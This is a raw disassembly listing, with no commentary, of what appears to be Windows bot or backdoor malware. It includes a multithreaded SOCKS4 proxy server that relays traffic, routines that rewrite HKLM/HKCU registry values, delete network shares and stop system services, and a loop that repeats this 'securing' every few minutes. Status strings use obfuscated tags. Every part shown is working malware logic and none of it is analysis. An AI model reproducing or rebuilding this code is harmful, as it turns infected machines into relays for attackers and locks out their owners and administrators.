; ---------------------------------------------------------------------------
loc_421510: ; CODE XREF: sub_421450+4D�j
push [ebp+arg_14]
call sub_4293A0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370B4 ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 2
loc_421536: ; CODE XREF: sub_421450+AE�j
; sub_421450+BE�j ...
push ebx
push edi
push [ebp+arg_4]
call dword_456F64 ; RegSetValueExA
test eax, eax
jnz short loc_421548
loc_421545: ; CODE XREF: sub_421450+3C�j
xor ebx, ebx
inc ebx
loc_421548: ; CODE XREF: sub_421450+56�j
; sub_421450+F3�j
push [ebp+arg_4]
call dword_456F08 ; RegCloseKey
pop edi
mov eax, ebx
pop esi
loc_421555: ; CODE XREF: sub_421450+30�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_421558: ; CODE XREF: sub_421450+46�j
push [ebp+arg_14]
call sub_4293A0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370B4 ; lstrcpyA
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 1
jmp short loc_421536
sub_421450 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421580 proc near ; CODE XREF: sub_421676+125�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_421596: ; CODE XREF: sub_421580+BB�j
; sub_421580+EB�j
xor ecx, ecx
mov [ebp+var_100], ebx
inc ecx
xor eax, eax
mov [ebp+var_104], ecx
loc_4215A7: ; CODE XREF: sub_421580+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_4215B8
inc eax
cmp eax, ecx
jb short loc_4215A7
loc_4215B8: ; CODE XREF: sub_421580+31�j
cmp eax, ecx
jnz short loc_4215C9
mov [ebp+eax*4+var_100], edx
inc [ebp+var_104]
loc_4215C9: ; CODE XREF: sub_421580+3A�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_456F1C ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_456DD8 ; __WSAFDIsSet
test eax, eax
jz short loc_421629
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_456F58 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_421671
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_421671
loc_421629: ; CODE XREF: sub_421580+7B�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_456DD8 ; __WSAFDIsSet
test eax, eax
jz loc_421596
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_456F58 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_421671
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jnz loc_421596
loc_421671: ; CODE XREF: sub_421580+90�j
; sub_421580+A7�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421580 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421676 proc near ; DATA XREF: sub_4217A4+99�o
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_420 = byte ptr -420h
var_41F = byte ptr -41Fh
var_41E = word ptr -41Eh
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
xor edi, edi
push ebx
lea eax, [ebp+var_524]
push ebx
inc edi
push eax
push ebx
mov [ebp+var_8], 5
mov [ebp+var_4], ebx
mov [ebp+var_520], esi
mov [ebp+var_524], edi
call dword_456F1C ; select
test eax, eax
jz loc_421769
push ebx
lea eax, [ebp+var_420]
push 408h
push eax
push esi
call dword_456F58 ; recv
test eax, eax
jle loc_421769
cmp [ebp+var_420], 4
jnz loc_421769
cmp [ebp+var_41F], 1
jnz short loc_421769
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_429760
mov ax, [ebp+var_41E]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_41C]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_456FD0 ; socket
mov edi, eax
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
push 400h
lea eax, [ebp+var_418]
push ebx
mov [ebp+var_420], bl
push eax
jnz short loc_421779
mov [ebp+var_41F], 5Bh
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_456F8C ; send
loc_421769: ; CODE XREF: sub_421676+40�j
; sub_421676+5C�j ...
push esi
call dword_456FF0 ; closesocket
loc_421770: ; CODE XREF: sub_421676+12C�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_421779: ; CODE XREF: sub_421676+D1�j
mov [ebp+var_41F], 5Ah
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_456F8C ; send
push esi
push edi
call sub_421580
pop ecx
pop ecx
jmp short loc_421770
sub_421676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4217A4 proc near ; DATA XREF: sub_40A9FE+17CA�o
var_E4 = byte ptr -0E4h
var_60 = dword ptr -60h
var_44 = dword ptr -44h
var_20 = byte ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0E4h
mov eax, [ebp+arg_0]
push esi
push edi
push 31h
pop ecx
mov esi, eax
lea edi, [ebp+var_E4]
mov [ebp+var_10], 2
rep movsd
push [ebp+var_44]
xor edi, edi
inc edi
mov [eax+0BCh], edi
call dword_456F38 ; ntohs
push 6
xor esi, esi
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
call dword_456FD0 ; socket
mov edi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456F6C ; bind
test eax, eax
jz short loc_42180E
push [ebp+var_60]
call sub_423623
pop ecx
push esi
call dword_437174 ; ExitThread
loc_42180E: ; CODE XREF: sub_4217A4+58�j
push 0Ah
push edi
call dword_456F68 ; listen
test eax, eax
jz short loc_42182B
push [ebp+var_60]
call sub_423623
pop ecx
push esi
call dword_437174 ; ExitThread
loc_42182B: ; CODE XREF: sub_4217A4+75�j
; sub_4217A4+A6�j
lea eax, [ebp+var_20]
push esi
push eax
push edi
call dword_456FE4 ; accept
lea ecx, [ebp+arg_0]
push ecx
push esi
push eax
push offset sub_421676
push esi
push esi
call dword_437180 ; CreateThread
jmp short loc_42182B
sub_4217A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42184C proc near ; CODE XREF: sub_422009+43�p
; sub_422009+9F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor edx, edx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], edx
xor esi, esi
loc_42185E: ; CODE XREF: sub_42184C+23E�j
mov eax, dword_44E18C[esi]
cmp eax, 4
jnz loc_421975
cmp [ebp+arg_0], edx
jz short loc_42187A
mov eax, dword_44E190[esi]
jmp short loc_421880
; ---------------------------------------------------------------------------
loc_42187A: ; CODE XREF: sub_42184C+24�j
mov eax, dword_44E194[esi]
loc_421880: ; CODE XREF: sub_42184C+2C�j
lea edi, dword_44E08B[esi]
lea ebx, dword_44DF8C[esi]
push eax
push edi
push ebx
push dword_44DF88[esi]
call sub_4213E8
add esp, 10h
test eax, eax
jz short loc_42190B
inc [ebp+var_8]
cmp [ebp+arg_14], 0
jnz loc_421A7C
cmp [ebp+arg_10], 0
jz loc_421A7C
cmp [ebp+arg_C], 0
jnz loc_421A7C
cmp [ebp+arg_0], 0
jz short loc_4218D0
mov ecx, dword_44E190[esi]
jmp short loc_4218D6
; ---------------------------------------------------------------------------
loc_4218D0: ; CODE XREF: sub_42184C+7A�j
mov ecx, dword_44E194[esi]
loc_4218D6: ; CODE XREF: sub_42184C+82�j
cmp dword_44DF88[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_4218EC
mov edx, offset aHkcu ; "HKCU"
loc_4218EC: ; CODE XREF: sub_42184C+99�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_4218FC
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_4218FC: ; CODE XREF: sub_42184C+A9�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToD_ ; "%s Set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_421A6E
; ---------------------------------------------------------------------------
loc_42190B: ; CODE XREF: sub_42184C+53�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz loc_421A7C
cmp [ebp+arg_10], 0
jz loc_421A7C
cmp [ebp+arg_C], 0
jnz loc_421A7C
cmp [ebp+arg_0], 0
jz short loc_42193A
mov ecx, dword_44E190[esi]
jmp short loc_421940
; ---------------------------------------------------------------------------
loc_42193A: ; CODE XREF: sub_42184C+E4�j
mov ecx, dword_44E194[esi]
loc_421940: ; CODE XREF: sub_42184C+EC�j
cmp dword_44DF88[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_421956
mov edx, offset aHkcu ; "HKCU"
loc_421956: ; CODE XREF: sub_42184C+103�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_421966
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421966: ; CODE XREF: sub_42184C+113�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSetSS ; "%s Failed to set \"%s\\%s\\%s\" to \"%d\"."
jmp loc_421A6E
; ---------------------------------------------------------------------------
loc_421975: ; CODE XREF: sub_42184C+1B�j
cmp eax, 1
jnz loc_421A7E
inc [ebp+var_8]
cmp [ebp+arg_0], edx
lea eax, dword_44E198[esi]
jnz short loc_421992
lea eax, dword_44E297[esi]
loc_421992: ; CODE XREF: sub_42184C+13E�j
lea edi, dword_44E08B[esi]
push 1
lea ebx, dword_44DF8C[esi]
push eax
push edi
push ebx
push dword_44DF88[esi]
call sub_421409
add esp, 14h
test eax, eax
jz short loc_421A17
cmp [ebp+arg_14], 0
jnz loc_421A7C
cmp [ebp+arg_10], 0
jz loc_421A7C
cmp [ebp+arg_C], 0
jnz loc_421A7C
cmp [ebp+arg_0], 0
lea ecx, dword_44E198[esi]
jnz short loc_4219E5
lea ecx, dword_44E297[esi]
loc_4219E5: ; CODE XREF: sub_42184C+191�j
cmp dword_44DF88[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_4219FB
mov edx, offset aHkcu ; "HKCU"
loc_4219FB: ; CODE XREF: sub_42184C+1A8�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_421A0B
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421A0B: ; CODE XREF: sub_42184C+1B8�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToS_ ; "%s Set \"%s\\%s\\%s\" to \"%s\"."
jmp short loc_421A6E
; ---------------------------------------------------------------------------
loc_421A17: ; CODE XREF: sub_42184C+167�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz short loc_421A7C
cmp [ebp+arg_10], 0
jz short loc_421A7C
cmp [ebp+arg_C], 0
jnz short loc_421A7C
cmp [ebp+arg_0], 0
lea ecx, dword_44E198[esi]
jnz short loc_421A3E
lea ecx, dword_44E297[esi]
loc_421A3E: ; CODE XREF: sub_42184C+1EA�j
cmp dword_44DF88[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_421A54
mov edx, offset aHkcu ; "HKCU"
loc_421A54: ; CODE XREF: sub_42184C+201�j
cmp [ebp+arg_0], 0
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_421A64
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421A64: ; CODE XREF: sub_42184C+211�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSet_0 ; "%s Failed to set \"%s\\%s\\%s\" to \"%s\"."
loc_421A6E: ; CODE XREF: sub_42184C+BA�j
; sub_42184C+124�j ...
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CE4A
add esp, 20h
loc_421A7C: ; CODE XREF: sub_42184C+5C�j
; sub_42184C+66�j ...
xor edx, edx
loc_421A7E: ; CODE XREF: sub_42184C+12C�j
add esi, 410h
cmp esi, 0C30h
jb loc_42185E
cmp [ebp+var_8], edx
pop edi
pop esi
pop ebx
jnz short loc_421ACF
cmp [ebp+arg_10], edx
jnz short locret_421B0D
cmp [ebp+arg_C], edx
jnz short locret_421B0D
cmp [ebp+arg_14], edx
jnz short locret_421B0D
cmp [ebp+arg_0], edx
mov ecx, offset aSecured ; "Secured"
jnz short loc_421AC8
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421ABB: ; CODE XREF: sub_42184C+281�j
push [ebp+var_4]
push edx
push ecx
push eax
push offset aSFailedToSRegi ; "%s Failed to %s Registry, (%.2d/%.2d)"
jmp short loc_421AFF
; ---------------------------------------------------------------------------
loc_421AC8: ; CODE XREF: sub_42184C+263�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_421ABB
; ---------------------------------------------------------------------------
loc_421ACF: ; CODE XREF: sub_42184C+24A�j
cmp [ebp+arg_10], edx
jnz short locret_421B0D
cmp [ebp+arg_C], edx
jnz short locret_421B0D
cmp [ebp+arg_14], edx
jnz short locret_421B0D
cmp [ebp+arg_0], edx
mov ecx, offset aSecure ; "Secure"
jnz short loc_421B0F
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_421AF2: ; CODE XREF: sub_42184C+2C8�j
push [ebp+var_4]
push [ebp+var_8]
push ecx
push eax
push offset aSRegistryS_2d_ ; "%s Registry %s, (%.2d/%.2d)"
loc_421AFF: ; CODE XREF: sub_42184C+27A�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CE4A
add esp, 1Ch
locret_421B0D: ; CODE XREF: sub_42184C+24F�j
; sub_42184C+254�j ...
leave
retn
; ---------------------------------------------------------------------------
loc_421B0F: ; CODE XREF: sub_42184C+29A�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_421AF2
sub_42184C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421B16 proc near ; CODE XREF: sub_422009+4E�p
; sub_422009+B6�p
var_4E54 = byte ptr -4E54h
var_2744 = byte ptr -2744h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 4E54h
call sub_429B60
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
push esi
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
jz loc_421D51
cmp [ebp+arg_14], ebx
mov [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_421B68
cmp [ebp+arg_C], ebx
jnz short loc_421B68
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
lea eax, [ebp+var_2744]
push offset dword_44F124
push eax
call sub_429B03
add esp, 10h
loc_421B68: ; CODE XREF: sub_421B16+2D�j
; sub_421B16+32�j ...
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push ebx
call dword_456E40
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_421C13
cmp eax, 0EAh
jz short loc_421C13
xor esi, esi
loc_421B9A: ; CODE XREF: sub_421B16+F6�j
push ebx
push off_44EBB8[esi]
push ebx
call dword_456DBC
test eax, eax
jnz short loc_421C03
cmp [ebp+arg_14], ebx
jnz short loc_421C00
cmp [ebp+arg_C], ebx
jnz short loc_421C00
cmp [ebp+arg_10], ebx
jz short loc_421C00
cmp [ebp+var_4], ebx
jle short loc_421BD3
lea eax, [ebp+var_2744]
push offset dword_44F120
push eax
call sub_42A5E0
pop ecx
pop ecx
loc_421BD3: ; CODE XREF: sub_421B16+A8�j
push off_44EBB8[esi]
lea eax, [ebp+var_4E54]
push offset off_44F11C
push eax
call sub_429B03
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A5E0
add esp, 14h
loc_421C00: ; CODE XREF: sub_421B16+99�j
; sub_421B16+9E�j ...
inc [ebp+var_4]
loc_421C03: ; CODE XREF: sub_421B16+94�j
add esi, 8
cmp esi, 138h
jb short loc_421B9A
jmp loc_421CA5
; ---------------------------------------------------------------------------
loc_421C13: ; CODE XREF: sub_421B16+75�j
; sub_421B16+80�j
mov edi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+arg_0], ebx
jb short loc_421C9A
loc_421C1E: ; CODE XREF: sub_421B16+182�j
mov esi, [edi]
push esi
call sub_42AA07
cmp word ptr [esi+eax*2-2], 24h
pop ecx
jnz short loc_421C91
push 0
push esi
push 0
call dword_456DBC
test eax, eax
jnz short loc_421C91
cmp [ebp+arg_14], eax
jnz short loc_421C8E
cmp [ebp+arg_C], eax
jnz short loc_421C8E
cmp [ebp+arg_10], eax
jz short loc_421C8E
cmp [ebp+var_4], eax
jle short loc_421C65
lea eax, [ebp+var_2744]
push offset dword_44F120
push eax
call sub_42A5E0
pop ecx
pop ecx
loc_421C65: ; CODE XREF: sub_421B16+13A�j
push dword ptr [edi]
lea eax, [ebp+var_4E54]
push offset off_44F11C
push eax
call sub_429B03
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A5E0
add esp, 14h
loc_421C8E: ; CODE XREF: sub_421B16+12B�j
; sub_421B16+130�j ...
inc [ebp+var_4]
loc_421C91: ; CODE XREF: sub_421B16+117�j
; sub_421B16+126�j
add edi, 28h
inc ebx
cmp ebx, [ebp+arg_0]
jbe short loc_421C1E
loc_421C9A: ; CODE XREF: sub_421B16+106�j
push [ebp+var_8]
call dword_456FE0
xor ebx, ebx
loc_421CA5: ; CODE XREF: sub_421B16+F8�j
cmp [ebp+var_14], 0EAh
jz loc_421B68
cmp [ebp+arg_10], ebx
jz short loc_421D23
cmp [ebp+arg_14], ebx
jnz loc_421E8E
cmp [ebp+arg_C], ebx
jnz loc_421E8E
cmp [ebp+var_4], ebx
jnz short loc_421CDD
loc_421CCE: ; CODE XREF: sub_421B16+222�j
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp loc_421E40
; ---------------------------------------------------------------------------
loc_421CDD: ; CODE XREF: sub_421B16+1B6�j
push [ebp+var_4]
push offset aErased ; "erased"
push offset aTotalSharesSD ; " Total shares: [%s: %d]"
loc_421CEA: ; CODE XREF: sub_421B16+348�j
lea eax, [ebp+var_4E54]
push eax
call sub_429B03
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A5E0
lea eax, [ebp+var_2744]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CE4A
add esp, 24h
jmp loc_421E8E
; ---------------------------------------------------------------------------
loc_421D23: ; CODE XREF: sub_421B16+19F�j
cmp [ebp+arg_14], ebx
jnz loc_421E8E
cmp [ebp+arg_C], ebx
jnz loc_421E8E
cmp [ebp+var_4], ebx
jz short loc_421CCE
push [ebp+var_4]
push offset aErased ; "erased"
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push offset aSTotalSharesSD ; "%s Total shares %s: [%d]"
jmp loc_421E80
; ---------------------------------------------------------------------------
loc_421D51: ; CODE XREF: sub_421B16+1B�j
cmp [ebp+arg_14], ebx
mov edi, offset aCreated ; "created"
jnz short loc_421D7A
cmp [ebp+arg_C], ebx
jnz short loc_421D7A
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
lea eax, [ebp+var_2744]
push offset dword_44F124
push eax
call sub_429B03
add esp, 10h
loc_421D7A: ; CODE XREF: sub_421B16+243�j
; sub_421B16+248�j
mov [ebp+arg_0], ebx
xor esi, esi
loc_421D7F: ; CODE XREF: sub_421B16+30A�j
mov eax, off_44EBB8[esi]
mov [ebp+var_30], ebx
mov [ebp+var_34], eax
mov eax, dword_44EBBC[esi]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_34]
push eax
push 2
push ebx
mov [ebp+var_2C], offset aUnloading ; "Unloading"
mov [ebp+var_28], ebx
mov [ebp+var_24], 4
mov [ebp+var_20], ebx
mov [ebp+var_18], ebx
call dword_456DE0
test eax, eax
jnz short loc_421E17
cmp [ebp+arg_14], ebx
jnz short loc_421E14
cmp [ebp+arg_C], ebx
jnz short loc_421E14
cmp [ebp+arg_10], ebx
jz short loc_421E14
cmp [ebp+var_8], ebx
jle short loc_421DE7
lea eax, [ebp+var_2744]
push offset dword_44F120
push eax
call sub_42A5E0
pop ecx
pop ecx
loc_421DE7: ; CODE XREF: sub_421B16+2BC�j
push off_44EBB8[esi]
lea eax, [ebp+var_4E54]
push offset off_44F11C
push eax
call sub_429B03
lea eax, [ebp+var_4E54]
push eax
lea eax, [ebp+var_2744]
push eax
call sub_42A5E0
add esp, 14h
loc_421E14: ; CODE XREF: sub_421B16+2AD�j
; sub_421B16+2B2�j ...
inc [ebp+var_8]
loc_421E17: ; CODE XREF: sub_421B16+2A8�j
add esi, 8
cmp esi, 138h
jb loc_421D7F
cmp [ebp+arg_10], ebx
jz short loc_421E63
cmp [ebp+arg_14], ebx
jnz short loc_421E8E
cmp [ebp+arg_C], ebx
jnz short loc_421E8E
cmp [ebp+var_8], ebx
jnz short loc_421E55
loc_421E3A: ; CODE XREF: sub_421B16+35A�j
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
loc_421E40: ; CODE XREF: sub_421B16+1C2�j
push offset aSNoSharesS_ ; "%s No shares %s."
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CE4A
add esp, 14h
jmp short loc_421E8E
; ---------------------------------------------------------------------------
loc_421E55: ; CODE XREF: sub_421B16+322�j
push [ebp+var_8]
push edi
push offset aTotalSharesS_0 ; " Total shares [%s: %d]"
jmp loc_421CEA
; ---------------------------------------------------------------------------
loc_421E63: ; CODE XREF: sub_421B16+313�j
cmp [ebp+arg_C], ebx
jnz short loc_421E8E
cmp [ebp+arg_14], ebx
jnz short loc_421E8E
cmp [ebp+var_8], ebx
jz short loc_421E3A
push [ebp+var_8]
push edi
push offset aJvatg1988z81 ; "jVATg1988z81"
push offset aSTotalShares_0 ; "%s Total shares [%s: %d]"
loc_421E80: ; CODE XREF: sub_421B16+236�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41CE4A
add esp, 18h
loc_421E8E: ; CODE XREF: sub_421B16+1A4�j
; sub_421B16+1AD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421B16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421E93 proc near ; CODE XREF: sub_422009+38�p
; sub_422009+85�p
var_24 = byte ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
xor edi, edi
mov [ebp+var_4], edi
mov esi, offset aFfec81uznt81 ; "fFEC81UzNT81"
loc_421EA6: ; CODE XREF: sub_421E93+119�j
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push 0
call dword_456F28 ; OpenSCManagerA
push 0F01FFh
mov [ebp+var_8], eax
push off_44DF68[edi]
push eax
call dword_456DC8 ; OpenServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_421F0F
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 424h
jnz loc_421F96
xor eax, eax
cmp [ebp+arg_C], eax
jz loc_421F96
cmp [ebp+arg_10], eax
jnz loc_421F96
cmp [ebp+arg_8], eax
jnz loc_421F96
push off_44DF78[edi]
push esi
push offset aSTheSServiceDo ; "%s The %s service does not exist."
jmp short loc_421F88
; ---------------------------------------------------------------------------
loc_421F0F: ; CODE XREF: sub_421E93+3E�j
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_456E44 ; ControlService
test eax, eax
jz short loc_421F5D
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_456E44 ; ControlService
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_421F58
cmp [ebp+arg_10], eax
jnz short loc_421F58
cmp [ebp+arg_8], eax
jnz short loc_421F58
push off_44DF78[edi]
push esi
push offset aSSServiceStopp ; "%s %s service stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE4A
add esp, 14h
loc_421F58: ; CODE XREF: sub_421E93+9F�j
; sub_421E93+A4�j ...
inc [ebp+var_4]
jmp short loc_421F96
; ---------------------------------------------------------------------------
loc_421F5D: ; CODE XREF: sub_421E93+8B�j
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 426h
jnz short loc_421F96
cmp [ebp+arg_C], 0
jz short loc_421F96
cmp [ebp+arg_10], 0
jnz short loc_421F96
cmp [ebp+arg_8], 0
jnz short loc_421F96
push off_44DF78[edi]
push esi
push offset aSTheSServiceWa ; "%s The %s service was not started."
loc_421F88: ; CODE XREF: sub_421E93+7A�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE4A
add esp, 14h
loc_421F96: ; CODE XREF: sub_421E93+4B�j
; sub_421E93+56�j ...
push ebx
call dword_456DE4 ; CloseServiceHandle
push [ebp+var_8]
call dword_456DE4 ; CloseServiceHandle
add edi, 4
cmp edi, 10h
jl loc_421EA6
xor eax, eax
cmp [ebp+var_4], eax
jnz short loc_421FDE
cmp [ebp+arg_10], eax
jnz short loc_422004
cmp [ebp+arg_8], eax
jnz short loc_422004
cmp [ebp+arg_C], eax
jnz short loc_422004
push esi
push offset aSNoServicesSto ; "%s No services stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
jmp short loc_422004
; ---------------------------------------------------------------------------
loc_421FDE: ; CODE XREF: sub_421E93+124�j
cmp [ebp+arg_10], eax
jnz short loc_422004
cmp [ebp+arg_8], eax
jnz short loc_422004
cmp [ebp+arg_C], eax
jnz short loc_422004
push [ebp+var_4]
push esi
push offset aSTotalServices ; "%s Total services stopped: %d"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE4A
add esp, 14h
loc_422004: ; CODE XREF: sub_421E93+129�j
; sub_421E93+12E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421E93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422009 proc near ; DATA XREF: sub_40A9FE+ADB�o
; sub_40A9FE+9E77�o ...
var_C4 = dword ptr -0C4h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C4h
mov eax, [ebp+arg_0]
push esi
push edi
push 31h
pop ecx
mov esi, eax
lea edi, [ebp+var_C4]
rep movsd
xor edi, edi
xor esi, esi
inc edi
cmp [ebp+var_2C], esi
mov [eax+0BCh], edi
jz short loc_42206C
loc_422034: ; CODE XREF: sub_422009+61�j
cmp dword_457034, esi
jnz short loc_42205F
push edi
push esi
push edi
push esi
push esi
call sub_421E93
push edi
push esi
push edi
push esi
push esi
push edi
call sub_42184C
push edi
push esi
push edi
push esi
push esi
push edi
call sub_421B16
add esp, 44h
loc_42205F: ; CODE XREF: sub_422009+31�j
push 0C3500h
call dword_437190 ; Sleep
jmp short loc_422034
; ---------------------------------------------------------------------------
loc_42206C: ; CODE XREF: sub_422009+29�j
cmp dword_457034, esi
mov edi, [ebp+var_C4]
jnz short loc_4220C7
cmp [ebp+var_30], esi
jz short loc_422096
push esi
lea eax, [ebp+var_C0]
push [ebp+var_14]
push [ebp+var_10]
push eax
push edi
call sub_421E93
add esp, 14h
loc_422096: ; CODE XREF: sub_422009+74�j
push esi
